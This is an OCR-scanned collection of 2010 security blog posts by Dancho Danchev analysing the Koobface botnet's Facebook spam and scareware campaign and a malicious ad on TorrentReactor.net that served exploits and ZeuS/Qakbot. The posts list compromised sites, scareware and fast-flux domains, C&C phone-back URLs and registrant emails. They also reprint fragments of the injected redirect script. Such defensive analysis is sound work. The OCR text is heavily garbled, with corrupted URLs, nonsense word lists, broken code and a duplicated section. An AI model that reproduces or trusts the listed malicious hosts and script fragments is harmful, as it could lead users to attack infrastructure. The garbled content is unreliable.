[21]Koobface Botnet Dissected in a TrendMicro Report 

[22]Movement on the Koobface Front - Part Two 

[23]Movement on the Koobface Front 

[24]Koobface - Come Out, Come Out, Wherever You Are 

[25]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [26]Dancho Danchev’s blog. Follow him 
[27]on Twitter. 


1. http: //ddanchev blogspot . com/2010/04/dissect ing-koobface-gangs- latest .htm] 

2. http://www. zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 

3. http: //ddanchev. blogspot . com/2010/03/koobf ace-redirectors~and-scareware html 

4. 


5. 
8600 

6. 

7. 

8. 

9. 
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ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about- the-koobface-gang/5452 
10. http: //ddanchev.blogspot.com/2010/02/diverse 
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= wishes-industry-happy.htm 


13. http: //ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550.htm 
14. http: //ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.htm 
15. 
16. http: //ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.htm 

17. http: //ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.htm 

18. http: //ddanchev.blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
18, 

20. http://content.zdnet . com/2346-12691_22-352597 .htm 

21. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
22. 
23, 

24. http: //ddanchev. blogspot .com/2009/07/koobface-come-out-come-out-wherever-you.htm 
25. http: //ddanchev. blogspot . com/2009/07/dissecting-koobface-worms-twitter .htm 
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26. http://ddanchev. blogspot .com/ 
27. http://twitter .com/danchodanche 


6.5.4 From the Koobface Gang with Scareware Serving Compromised Sites 
(2010-05-08 20:46) 


System folders 
CJ ‘Shared Docments CJ My Documents 
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Gy Mv Network Paces To help protect your Computer, Windows Web Security 
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Recommend: Cick “Start Protecton” button to erase af treats 


Following last month’s "[1]Dissecting Koobface Gang’s Latest Facebook Spreading Cam- 
paign" Koobface gang coverage, it’s time to summarize some of their botnet spreading 
activities, from the last couple of days. 


Immediately after the suspension of their automatically registered Blogspot accounts, 
the gang once again proved that it has contingency plans in place, and started pushing links 
to compromises sites, in a combination with an interesting "visual social engineering trick", 
across Facebook, which sadly works pretty well, in the sense that it completely undermines 
the "don’t click on links pointing to unknown sites" type of security tips. 


« Recommended reading: [2] 10 things you didn’t know about the Koobface gang 


The diverse set of activities courtesy of the Koobface gang - consider going through the 
related posts in order to understand their underground multitasking mentality beyond the 
Koobface botnet itself - are a case study on the abuse of legitimate infrastructure with clean 
IP/AS reputation, for purely malicious purposes. 
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This active use of the "trusted reputation chain", just like the majority of social engineering 
centered tactics of the gang, aim to exploit the ubiquitous weak link in the face of the average 
Internet user. Here’s an example of the most recent campaign. 


The spreading of fully working links such as the following ones across Facebook: 
facebook.com/I/6e7e5;bit.ly/9QjjSk 


facebook.com/I/cdfb;bit.ly/9QjjSk 


facebook.com/I/f3c29;bit.ly/9QjjSk 


adorable beacon caricature overpowering point-blank poison rally ram waste 


http 98.66 f aerit 
& Tweets 0, Kj Shares 222, Comments 1; gp Shares 0, JB Comments on Page 0 
esi her 289; ta 6 ViewA 


Traffic 
Clicks Referrers Locations 
Past Weel Past Montt Total 
Click(s) 2,601 Since May 01, 2010 EST 


(Blom) 
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aims to trick the infected user’s friends, that this is a Facebook.com related link. Click- 
ing on this link inside Facebook leads to the "Be careful" window showing just the bit.ly 
redirector, to finally redirect to 198.65.28.86/swamt/ where a Koobface bogus video has 
already been seen by 2,601 users which have already clicked on the link. 


The scareware redirectors/actual serving domains are parked at 195.5.161.126, [3]AS31252, 
STARNET-AS StarNet Moldova: 


lnasa-test.com - Email: test@now.net.cn 
lonline-test.com - Email: test@now.net.cn 
lwww2scanner.com - Email: test@now.net.cn 
2a-scanner.com - Email: test@now.net.cn 
2nasa-test.com - Email: test@now.net.cn 
2online-test.com - Email: test@now.net.cn 
2www2scanner.com - Email: test@now.net.cn 
3a-scanner.com - Email: test@now.net.cn 
3nasa-test.com - Email: test@now.net.cn 
3online-test.com - Email: test@now.net.cn 
3www2scanner.com - Email: test@now.net.cn 
4a-scanner.com - Email: test@now.net.cn 
4check-computer.com - Email: test@now.net.cn 
4nasa-test.com - Email: test@now.net.cn 
4online-test.com - Email: test@now.net.cn 
4www2scannercom - Email: test@now.net.cn 
5a-scanner.com - Email: test@now.net.cn 
5nasa-test.com - Email: test@now.net.cn 


5online-test.com - Email: test@now.net.cn 
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6a-scanner.com - Email: test@now.net.cn 
defence-status6.com - Email: test@now.net.cn 
defence-status7.com - Email: test@now.net.cn 
mega-scan2.com - Email: test@now.net.cn 
protection-status2.com - Email: test@now.net.cn 
protection-status4.com - Email: test@now.net.cn 
protection-status6.com - Email: test@now.net.cn 
security-statusl1.com - Email: test@now.net.cn 
security-status3.com - Email: test@now.net.cn 
security-status4.com - Email: test@now.net.cn 
security-status6.com - Email: test@now.net.cn 
securitystatus7.com - Email: test@now.net.cn 
securitystatus8.com - Email: test@now.net.cn 
securitystatus9.com - Email: test@now.net.cn 


security-status9.com - Email: test@now.net.cn 


among devotion Feit furore gentle mconsolable mhibated senility 


conspicuous downhearted farewell badey nigghng pronoanced reflection scheol-book shitk spoil 


breeze bruiser chew condition impolite limit luscious shatter smelly success talk wastrel 


capmulate detach hack? helping boeror lamentable moral radBery rally reactionary resourceful retard sproce stigma ungyatefal weary 


accurate analyee assertion certain dsnfect evidently fimch gala intermediary mystify coul spite vapour veroed 


calamity dominion exactly halfwit hurt maroon mine pleasure politics resignation sicken 
strong tarty temporal trophy 
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Detection rates: 
- setup.exe - [4]Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08 %) 


- RunAV 312s2.exe - [5]VirTool.Win32.Obfuscator.hg!b (v); High Risk Cloaked Malware - 
Result: 4/41 (9.76 %) 


The scareware sample phones back to: 


- windows32-sys.com/download/winlogo.bmp - 91.213.157.104, AS13618 CARONET-ASN - 
Email: contact@privacy-protect.cn 


- sysdilupdates.com/?b=312s2 - 87.98.134.197, AS16276, OVH Paris - Email: contact@privacy- 
protect.cn 


The complete list of compromised sites distributed by Koobface-infected Facebook users: 


02f32e3.netsolhost.com /0492dc/ 
abskupina.si /cclq/ 
adi-agencement.fr /8r2twm/ 
agilitypower.dk /ko2/ 
aguasdomondego.com /d5yodi/ 
alabasta.homeip.net /e8/ 
alankaye.info /2cgg/ 
alpenhaus.com.ar /al5zvf5/ 
animationstjo.fr /5c/ 
artwork.drayton.co.uk /k5wz/ 


beachfishingwa.org.au /u8g98ai/ 
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bildtuben.se /19jg/ 

chalet.se /srb/ 

charlepoeng.be /i0twbt/ 
christchurchgastonia.org /Lhkq/ 
chunkbait.com /gb4i6ak/ 
cityangered.se /besttube/ 
clarkecasa.net /rhk6/ 
clr.dsfm.mb.ca /2964/ 
codeditor.awardspace.biz /uncensoredclip/ 
coloridellavita.com /sc/ 
cpvs.org /6eobhOn/ 
danieletranchita.com /yourvids/ 
dennis-leah.zzl.org /m95/ 
doctorsorchestra.com /qw/ 
dueciliguria.it /zircu/ 
ediltermo.com /p4zhvj0/ 
emmedici.net /2pg46mk/ 


eurobaustoff.marketing-generator.de /52649an/ 


<html> 
shead> 

étitle>Loading</titie> 

“eta name-"robots” centent@"noindex, nofollow, soarchive" 

<eeript> 

fumetion a76939f£80bD () (cry( window. parent. location location: )catch(e) ()teyl wisdow. top. location* location: catch 


e¢)() ) window. onerror-a7é939f80bb; 


if (vindgov. parent. frames. length>0) if (vindow. parent .docuwrent .body. imnecNTML) : 


“"MivkeS ixviherEqjcp*.ceplace (/{ivkelxvas 


eajcp) +/g, °") sig inavigator.appVersion. ind 
SdSe4Za02fdi() (var saad 2c23c $3 


S3-vindov.navigator.userAgentivar ab 62¢ 
O1dd1S3 .subste ing (ab42 7ee4S, aaa0cO3 6atic2IcbiddiS3. index0d('.", ab4 
S8ePdSetlallf(di():)funccion gP3d7b2 ( l4cebOOSdfc7Tdl tana) (if (window.e0S5e118a86 


arn 


-getElement ByIa("c S4a219* 
rotection.com?mid« erro |} return 


‘ent ("onunioad’,h9b1i240¢92aSbalse) :else windov.addiventListener (* unload’ ,h9b1240492 aSbadée, false) ; 
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Tse Tale) >0) (window.c0Se116486e90b4n7 168" 
o81dd153.indexOr (beec7L2783e7a0er' 


« LaunchURL | LdcebOOSdte7di iaaa) :) pelse( location. href= l4cebOOSdte7di 1aaa: 


euskorock.es /p4zm/ 
explicitflavour.freeiz.com /qk3r/ 
f9phx.net /svr/ 

fatucci.it /l04s8m2/ 
forwardmarchministries.org /1bc/ 
fotoplanet.it /bnog6s/ 
frenchbean.co.uk /zwr/ 
furius.comoj.com /1azl/ 

geve.be /oj4ex4/ 
gite-maison-pyrenees-luchon.com /jox/ 
googleffffffffa0ac4d9f.omicronrecords.com /me/ 
gosin.be /ist63z/ 

grimslovsms.se /cutetube/ 
guest.worldviewproduction.com /m2f/ 
hanssen-racing.com /j15/ 

helpbt.com /nqo40uq/ 
helpdroid.omicronrecords.com /7h/ 
hoganjobs.com /jrepsp/ 

holustravel.cz /5j5/ 

hoperidge.com /fltwizy/ 
hottesttomato.com /6b/ 
iglesiabetanial.com /7y7/ 
ihostu.co.uk /jic9v/ 


ilterrazzoallaveneziana.it /4vxaq5/ 
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integratek.omicronrecords.com /to4u2bd/ 


irisjard.o2switch.net /Ib/ 
islandmusicexport.com /hbi2ut9/ 
isteinaudi.it /h2a/ 


johnphelan.com /uynv4/ 


<html> 
<head> 
<title>Loading</title> 


caeta names"rcbots” centent**noisdex, nofollow, soarchive 


<seript> 
fumction aaf%OdaséSea2ab() (try window. parent. location’ 


</meript 


() (g52acsD3 
Vindow. atta 


jsacm.com /z6/ 

kabchicago.info /1lcgko/ 
katia-paliotti.com /Obaktz/ 
kennethom.net /I20/ 

kleppcc.com /aliendemonstration/ 
klimentglass.cz /vwalp/ 
kvarteretekorren.se /60/ 
lanavabadajoz.com /cg/ 
langstoncorp.com /02072c/ 
libermann.phpnet.org /madu8p/ 


lineapapel.com /8120up/ 
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location; 


catchie 


ibiztéaris itetur 
c9) else window. addfventListener (" unload’, h20éb668c9, false) ; 


na@ov. parent. frames, length>0) if (vindovw. parent . doourent .body. innecHTHL) 7 


e n 


ne loc 


() teyl window. top. location 


cOd) (af (windov.e7£675) (1 
(158403729¢0d) =} 


longting.nl /6ch/ 
mainteck-fr.com /qjbo5v/ 
majesticdance.com /v1lg/ 
mia-nilsson.se /cmc/ 
microstart.fr /Izu1/ 
migdal.org.il /y952eo/ 
mindbodyandsolemt.com /pnbn/ 
musicomm.ca /a5z/ 
nassnig.org /z1/ 

neweed.org /x4t/ 
nosneezes.com /5hjkdjo/ 
nottinghamdowns.com /m7ec/ 
nutman-group.com /92m/ 
omicronsystems.inc.md /eho0/ 
on3la.be /bgfhclg/ 
onlineadmin.net /b7uccx/ 
ornskoldskatten.se /m1u/ 


oxhalsobygg.se /amaizingmovies/ 


« Recommended reading: [6]Dissecting Koobface Gang’s Latest Facebook Spreading Cam- 
paign 
partenaires-particuliers.fr /uo/ 
pegasolavoro.it /316/ 
peteknightdays.com /40k4/ 


pheromoneforum.org /ds/ 
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pilatescenter.se /bgx8e/ 
plymouth-tuc.org.uk /xhaq/ 
popeur.fr /m7yaw/ 
pro-du-bio.com /af6xtp/ 
prousaudio.com /4isg/ 
puertohurraco.org /q3algz/ 
radioluz900am.com /3i993/ 
reporsenna.netsons.org /zvz/ 
rhigar.nu /6v/ 
richmondpowerboat.com /tifax5/ 
rmg360.co.cc /22i/ 
roninwines.com /wonderfulvids/ 
rrmaps.com /j60/ 

rvi.it /bv6k/ 

scarlett-oharas.com /my0333/ 
secure.tourinrome.org /qyp/ 
servicehandlaren.se /yq9ahw0/ 
servicehandlaren.spel-service.com /q9q115/ 
sgottnerivers.com /yOj16rw/ 
shofarcall.com /zi/ 


sirius-expedition.com /x4yab/ 
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<htal> 
<head> 
<title>Loading</title> 


Geeta namer"robots” centent*"noindex,nofoll moarchive”> 


<seript> 

function aclacicSS?£be6S() (ery( window. paren at =location: 

if (window. parent. frames, length>0) if (vindow. parent .document.body. inner TEL): 
</acript 

ssoript> 

bSTO66O*"EnsslSixmlulsEiqtt™.rceplace [/ [nzlixmugt) +/g, 7"): sf (mavigator-appVer 


Olda>O) return 


sicsc.co.uk /Okem/ 
soderback.eu /xvg9/ 
spel-service.com /xm/ 
sporthal.msolutions.be /vyx3yu/ 
steelstoneind.com /yzp/ 
stgeorgesteel.com /ji/ 
stgeorgesteel.com /ylnwir/ 
stubbieholderking.com /dyarx1/ 
sweet-peasdog.se /Orcjo/ 
taekwondovelden.n!l /mhnskk/ 
testjustin.comze.com /oafxzy/ 
the-beehive.com /r8x3cm/ 
the-beehive.com /weqw7e/ 
thedallestransmission.com /rjsg2/ 
therealmagnets.comuv.com /3wn19n/ 
thestrategicfrog.110mb.com /66vv/ 
tizianozanella.it/ k2cei/ 
trustonecorp.com /mabmpp/ 


unna.nu /6lie/ 


0 Ofee() (var aaSecé0153210}ef 16} 0a?-windov, savigator.userAgent: var 


103ef1630a7.indgexOr('.', 
naow.efiatite1024 
5) elsel location. href+if3éa00Tc3atéfefe:} 


location location; 


jeatch(e) ( 


abba2 1e40703 ffzeOida) )) srecurn 


(‘ unload’ , kttebenge2 


window. onerror*aclacics 


(af (window, fefclesdtO616254<6) 


V7 ibeés; 


fumetsc 


1eSS26£396, false): 
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uroloki.omicronrecords.com /9t/ 
vaxjoff.com /4fpu/ 

veerle-frank.be /101/ 

verdiverdi.net /3tt/ 
visionministerial.com /p191/ 
waffotis.se /yufi3u/ 
watsonspipingandheating.com /krda/ 
welplandeast.com /6q/ 
WESTCOASTPERFORMANCECOATINGS.COM /1tw4/ 
williamarias.us /na9mq/ 
woodworksbyjamie.com /90mrjb/ 
wowparis2000.com /rtsz/ 

yin-art.be /a75ble/ 


youniverse.site50.net /4a9r/ 


Due to the diversity of its cybercrime operations, the Koobface gang is always worth 
keeping an eye on. Best of all - it’s done semi-automatically these days. 


The best is yet to come, stay tuned! 


Related Koobface gang/botnet research: 

[7]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[8]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[9]10 things you didn’t know about the Koobface gang 


[10]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface 
Gang 
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[11]How the Koobface Gang Monetizes Mac OS X Traffic 

[12]The Koobface Gang Wishes the Industry "Happy Holidays" 
[13]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[14]Koobface Botnet Starts Serving Client-Side Exploits 

[15]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[16]Koobface Botnet’s Scareware Business Model - Part Two 
[17]Koobface Botnet’s Scareware Business Model - Part One 
[18]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[19]New Koobface campaign spoofs Adobe’s Flash updater 
[20]Social engineering tactics of the Koobface botnet 

[21]Koobface Botnet Dissected in a TrendMicro Report 
[22]Movement on the Koobface Front - Part Two 

[23]Movement on the Koobface Front 

[24]Koobface - Come Out, Come Out, Wherever You Are 


[25]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [26]Dancho Danchev’s blog. Follow him 
[27]on Twitter. 


1. http: //ddanchev. blogspot . com/2010/04/dissecting-koobface-gangs- latest .html 
2. http: //www.zdnet .com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 
3. http: //ddanchev blogspot . com/2010/03/koobface-redirectors-and- scareware htm] 
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5 
38600 
6. http: //ddanchev blogspot . com/2010/04/dissecting-koobface-gangs- latest . html 
7. htp:/ /adanchev. blogspot con/2010/04/dissecting-koobface-gangs-latest al 
hep //atanctn. ogee. 280/03 acecredirestors-ndcarerrs, el 
. http: //www.zdnet. ay EET cee you-didnt-know-about-the-koobface-gang/5452 
10, [cep aauncie ogspee cen 2000/ 07 aivenee"poetiori-o® sausevariscine: nea 
11. http: //adanchev. blogspot .con/2010/02/now-koobface-gang-monet1205~nac~os~1htal 
12, http: //adanchev. blogspot -con/2008/12/koobface-gang-¥ishes~industz)-happy 
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13. http://ddanchev.blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550. htm 

14. http: //ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.htm 
15. http: //ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
16. http: //ddanchev.blogspot .com/2009/11/koobface-botnets-scareware-business.htm 

17. http: //ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.htm 

18. http: //ddanchev.blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
18. 

20. http://content.zdnet .com/2346-12691_22-352597 .htm 

21. 
22. 

23. http: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front .htm 

24 
25. http: //ddanchev. blogspot . com/2009/07/dissecting-koobface-worms-twitter.htm 

26. 

27. 


6.5.5 TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Mali- 
cious Ad (2010-05-11 08:34) 


wW 
WW BEATORANET 


Deja vu! 


[1JJ}erome Segura at the Malware Diaries is reporting that TorrentReactornet, a _ high- 
trafficked torrents tracker, is currently serving live-exploits through a malicious ad served by 
"Fulldls.com - Your source for daily torrent downloads". 


Why deja vu? It’s because the [2]TorrentReactor.net malware campaign takes me back 
to 2008, among the very first extensive profiling of Russian Business Network activity, with 
their mass "input validation abuse" campaign back then, successfully appearing on numerous 
high-trafficked web sites, serving guess what? Scareware. 
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Moreover, despite the surprisingly large number of people still getting impressed by the 
use of http referrers as an evasive practice applied by the cybercriminals, these particular 
campaigns ( [3]ZDNet Asia and TorrentReactor IFRAME-ed; [4]Wired.com and History.com 
Getting RBN-ed; [5]Massive IFRAME SEO Poisoning Attack Continuing ) are a great example of 
this practice in use back then: 


¢ So the malicious parties are implementing simple referrer techniques to verify that the 
end users coming to their IP, are the ones they expect to come from the campaign, and 
not client-side honeypots or even security researchers. And if you’re not coming from 
you're supposed to come, you get a 404 error message, deceptive to the very end of it. 


The most recent compromise of TorrentReactor.net appears to be taking place through a 
malicioud ad serving exploits using the NeoSploit kit, which ultimately drops a ZeuS crimeware 
sample hosted within a fast-flux botnet. 


wi lect.le stats rrefe~.* acts) fubis| coms 


i] Hire od sdoeram.com = /®ad_typenframetiad_sine= 72h Wtisaction 655766 44% 


The campaign structure, including detection rates, phone back locations and ZeuS crimeware 
fast-flux related data is as follows: 

- ads.fulldis.com /phpadsnew/www/delivery/afr.php?zoneid=1 &cb=291476 

- ad.leet.la /stats?ref= .*ads\.fulldls\.com $ - 208.111.34.38 - Email: 
bertrand.crevin@brutele.com (leet.la - 212.68.193.197 - AS12392, ASBRUTELE AS Object 
for Brutele SC) 

- lo.dep.it /info/usl.html - 91.212.127.110 - lo.dep.It - 91.212.127.110 - AS49087, Telos- 
Solutions-AS Telos Solutions LTD 

- 91.216.3.108 /del1/index.php; 91.216.3.108 /cal/main.php - AS50896, PROXIEZ-AS PE Niko- 
laev Alexey Valerievich 

- 91.216.3.108 responding to gaihooxaefap.com - Nikolay Vukolov, Email: woven@qx8.ru 


Upon successful exploitation, the following malicious pdf is served: 

- eac27d.pdf - [6JExploit.PDF-JS.Gen (v); JS:Pdfka-AET; - Result: 6/40 (15 %) which when 
executed phones back to 91.216.3.108 /cal/banner.php/1fdal6ldabledd2f385d43c7- 
05a541d3?spl=pdf 30apr and drops: 

- myexebrexe - [7]TSPY _QAKBOT.SMG - Result: 17/41 (41.47 %) which then phones back 
to the ZeuS crimeware C &C: [8]saiwoofeutie.com /bin/ahwohn.bin - 78.9.77.158 - Email: 
spasm@maillife.ru 
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ns2.growthproperties net > 15.94.34.196 nit — 150008 ————@ 4571 


ESZ ATOPIC HOEK CCT eS 17) 33S) SB me eS eS AS? 


Fast-fluxed domains sharing the same infrastructure: 

demiliawes.com - Email: bust@qx8.ru 

jademason.com - = 213.156.118.221; 217.201.4.95; 24.139.152.4; 83.10.238.182; 
85.176.73.211; 112.201.223.129; 119.228.44.124; 170.51.231.93 - Email: 
blare@bigmailbox.ru 

laxahngeezoh.com - 190.135.224.89; 213.156.118.221; 217.201.4.95; 24.139.152.4; 
83.10.238.182; 85.176.73.211; 112.201.223.129; 119.228.44.124 - Email: zig@fastermail.ru 
line-ace.com - Email: greysy@gmx.com 

xareemudeixa.com - 112.201.223.129; 119.228.44.124; 170.51.231.93; 190.135.224.89; 
213.156.118.221; 217.201.4.95; 24.139.152.4; 85.176.73.211 - Email: writhe@fastermail.ru 
zeferesds.com - 190.135.224.89; 213.156.118.221; 217.201.4.95; 24.139.152.4; 
83.10.238.182; 85.176.73.211; 112.201.223.129; 119.228.44.124 - Email: 
mated@freemailbox.ru 


Name servers of notice: 

ns1.rexonna.net - 202.60.74.39 - Email: aquvafrog@animail.net 
ns2.rexonna.net - 25.120.19.23 

ns1.line-ace.com - 202.60.74.39 - Email: greysy@gmx.com 
ns2.line-ace.com - 67.15.223.219 

nsl.growthproperties.net - 62.19.3.2 - Email: growth@support.net 
ns2.growthproperties.net - 15.94.34.196 

ns1.tropic-nolk.com - 62.19.3.2 - Email: greysy@gmx.com 
ns2.tropic-nolk.com - 171.103.51.158 


These particular iFrame injection Russian Business Network’s campaigns from 2008, used 
to rely on the following URL for their malicious purposes - a-n-d-the.com/wtr/router.php 
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(216.255.185.82 - INTERCAGE-NETWORK-GROUP2). Why am | highlighting it? Excerpts from 
previous profiled campaigns, including one that is directly linked to the Koobface gang’s 
blackhat SEO operations. 


[9]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding : 


* The compromised/mis-configured web sites participating in this latest blackhat SEO cam- 
paign are surprisingly redirecting to a-n-d-the.com /wtr/router.php - 95.168.177.35 - 
Email: bulk@spam.lv - AS28753 NETDIRECT AS NETDIRECT Frankfurt, DE if the http re- 
ferrer condition isn’t met. This very same domain - back then parked at INTERCAGE- 
NETWORK-GROUP2 - was also used in the same fashion in March, 2008’s massive blackhat 
SEO campaigns serving scareware. 


Not only is a-n-d-the.com /wtr/router.php (95.168.177.35) (Web [10]sessions of the URL 
acting as [11]a redirector), the exact same URL that was in circulating in 2008, residing on the 
Russian Business Network’s netblock back then, still active, but also, it’s currently redirecting 
to - if the campaign’s evasive conditions are met - to www4.zaikob8.xorg.pl/?uid=213 &pid=3 
&ttl=31345701120 - 217.149.251.12. 


What this proves is fairly simple - with or without the Russian Business Network the way 
we used to know it, it’s customers simply moved on to the competition, whereas the original 
Russian Business Network simply diversified its netblocks ownership. 


Related posts: 

[12]ZDNet Asia and TorrentReactor IFRAME-ed 
[13]Wired.com and History.com Getting RBN-ed 
[14]Massive IFRAME SEO Poisoning Attack Continuing 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him 
[16]Jon Twitter. 


H 


ttp://blogs .paretologic.com/malwarediaries/index.php/2010/05/10/torrentreactor-net-leads-to-exploit/ 


. http: //ddanchev. blogspot. com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 
. http: //ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 


ttp://ddanchev. blogspot .com/2008/03/wiredcom-and-historycom-getting-rbn-ed.htm 


ttp://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.htm 


: ttp://www.virustotal.com/analisis/e4db79b30d24c9d186caca7d6e5501c97 15acc0e3cf85bdee4927094f 7b5cf 1c-1273 


rs 
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N 


ttp://www.virustotal.com/analisis/cdf£b7624e1367215ddb50ea951d51f 168f1f£f2e0e978059685e9ef 23435240fe-1273 


5 
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ttps://zeustracker.abuse.ch/monitor .php?host=saiwoofeutie.co 


kr oO © 


. http: //ddanchev. blogspot .com/2009/08/us- federal-forms-blackhat-seo-themed.htm 
0. http://1.bp.blogspot.com/_wICHhTiQmrA/Soq9I_Vhk9I/AAAAAAAAFEc/9Cx7eWgPgXQ/s1600-h/blackhat_seo_tax_latest 


1. http://2.bp.blogspot.com/_wICHhTiQmrA/SoquQLktZwI /AAAAAAAAFDs/mFbh2WiDBf4/s1600-h/blackhat_seo_tax_latest 
9. JP 
. http://ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 
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3. http://ddanchev. blogspot .com/2008/03/wiredcom-and-historycom-getting-rbn-ed.htm 
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. http: //ddanchev.blogspot .com/2008/03/massive-iframe-seo-poisoning-attack.htm 


15. http: //ddanchev.blogspot.com/ 
16. http://twitter.com/danchodanche 


6.5.6 TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Mali- 
cious Ad (2010-05-11 08:34) 


W 
WW BEATORANET 


Deja vu! 


[1]J}erome Segura at the Malware Diaries is reporting that TorrentReactornet, a high- 
trafficked torrents tracker, is currently serving live-exploits through a malicious ad served by 
"Fulldls.com - Your source for daily torrent downloads". 


Why deja vu? It’s because the [2]TorrentReactor.net malware campaign takes me back 
to 2008, among the very first extensive profiling of Russian Business Network activity, with 
their mass "input validation abuse" campaign back then, successfully appearing on numerous 
high-trafficked web sites, serving guess what? Scareware. 


Moreover, despite the surprisingly large number of people still getting impressed by the 
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use of http referrers as an evasive practice applied by the cybercriminals, these particular 
campaigns ( [3]ZDNet Asia and TorrentReactor IFRAME-ed; [4]Wired.com and History.com 
Getting RBN-ed; [5]Massive IFRAME SEO Poisoning Attack Continuing ) are a great example of 
this practice in use back then: 


¢ So the malicious parties are implementing simple referrer techniques to verify that the 
end users coming to their IP, are the ones they expect to come from the campaign, and 
not client-side honeypots or even security researchers. And if you’re not coming from 
you're supposed to come, you get a 404 error message, deceptive to the very end of it. 


The most recent compromise of TorrentReactor.net appears to be taking place through a 
malicioud ad serving exploits using the NeoSploit kit, which ultimately drops a ZeuS crimeware 
sample hosted within a fast-flux botnet. 


wi leet.lo Rats rreler-,* ads) fuldis| com 


Pet] nite od sdoeram.com /@ad_typenframetiad _sine= 72h Wtisaction 6559766 4,404 


The campaign structure, including detection rates, phone back locations and ZeuS crimeware 
fast-flux related data is as follows: 


- ads.fulldis.com /phpadsnew/www/delivery/afr.php?zoneid=1 &cb=291476 


- ad.leet.la /stats?ref= :“ads\.fulldis\.com $ - 208.111.34.38 - Email: 
bertrand.crevin@brutele.com (leet.la - 212.68.193.197 - AS12392, ASBRUTELE AS Object 
for Brutele SC) 


- lo.dep.|t /info/usl.html - 91.212.127.110 - lo.dep.It - 91.212.127.110 - AS49087, Telos- 
Solutions-AS Telos Solutions LTD 


- 91.216.3.108 /del/index.php; 91.216.3.108 /cal/main.php - AS50896, PROXIEZ-AS PE 
Nikolaev Alexey Valerievich 


- 91.216.3.108 responding to gaihooxaefap.com - Nikolay Vukolov, Email: woven@qx8.ru 
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Upon successful exploitation, the following malicious pdf is served: 


- eac27d.pdf - [6]JExploit.PDF-JS.Gen (v); JS:Pdfka-AET; - Result: 6/40 (15 %) which when 
executed phones back to 91.216.3.108 /cal1/banner.php/1fda161dabledd2f385d43c7- 
05a541d3?spl=pdf 30apr and drops: 


- myexebr.exe - [7]TSPY _QAKBOT.SMG - Result: 17/41 (41.47 %) which then phones 
back to the ZeuS crimeware C &C: [8]saiwoofeutie.com /bin/ahwohn.bin - 78.9.77.158 - Email: 
spasm@maillife.ru 
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—— 196.720.0115 — Ee ASIISSE 
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DGD 1G5.64 0010 cl, 51 5009 
189.194.690.119 ————_Z ge custorner-nal-69-113 megared netenx 
201.241.102230 ———M gm 9201 241.986.0720 ——_—_—_—______“8___ 522017 
62.194.167.116 ———“&)_________m 2194194021 ———_—_____+t_____ 53920 


 fademason com >—2— 93.120 222.153 host232-94-dynamic 14-87-rretail telecomitaia® 
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9422.16.157 GEL 20.292.001 8 ee AS25505 


com 94.220.016 As pe 49i55a? 


N31 growthpropertes.net ee 62.19.0021 ———L «512002 
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MSL tropic-metk com vps-62:19-3-2 atiadl us minet 
ns2.growthproperties. net —A————————  15.94.94.196 ———________ Si __» 160.009 ——_—_+h—@ 4571 
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Fast-fluxed domains sharing the same infrastructure: 
demiliawes.com - Email: bust@qx8.ru 


jademason.com - 213.156.118.221; 217.201.4.95; 24.139.152.4; 83.10.238.182; 
85.176.73.211; 112.201.223.129; 119.228.44.124; 170,51.231.93 ° = Email: 
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blare@bigmailbox.ru 


laxahngeezoh.com - 190.135.224.89; 213.156.118.221; 217.201.4.95; 24.139.152.4; 
83.10.238.182; 85.176.73.211; 112.201.223.129; 119.228.44.124 - Email: zig@fastermail.ru 


line-ace.com - Email: greysy@gmx.com 


xareemudeixa.com - 112.201.223.129; 119.228.44.124; 170.51.231.93; 190.135.224.89; 
213.156.118.221; 217.201.4.95; 24.139.152.4; 85.176.73.211 - Email: writhe@fastermail.ru 


zeferesds.com - 190.135.224.89;: 213.156.118.221; 217.201.4.95; 24.139.152.4; 


83.10.238.182; 85.176.73.211; 112.201.223.129; 119.228.44.124  - Email: 
mated@freemailbox.ru 


Name servers of notice: 

ns1.rexonna.net - 202.60.74.39 - Email: aquvafrog@animail.net 
ns2.rexonna.net - 25.120.19.23 

ns1.line-ace.com - 202.60.74.39 - Email: greysy@gmx.com 
ns2.line-ace.com - 67.15.223.219 

nsl.growthproperties.net - 62.19.3.2 - Email: growth@support.net 
ns2.growthproperties.net - 15.94.34.196 

ns1.tropic-nolk.com - 62.19.3.2 - Email: greysy@gmx.com 


ns2.tropic-nolk.com - 171.103.51.158 


These particular iFrame injection Russian Business Network’s campaigns from 2008, used 
to rely on the following URL for their malicious purposes - a-n-d-the.com/wtr/router.php 
(216.255.185.82 - INTERCAGE-NETWORK-GROUP2). Why am | highlighting it? Excerpts from 
previous profiled campaigns, including one that is directly linked to the Koobface gang’s 
blackhat SEO operations. 


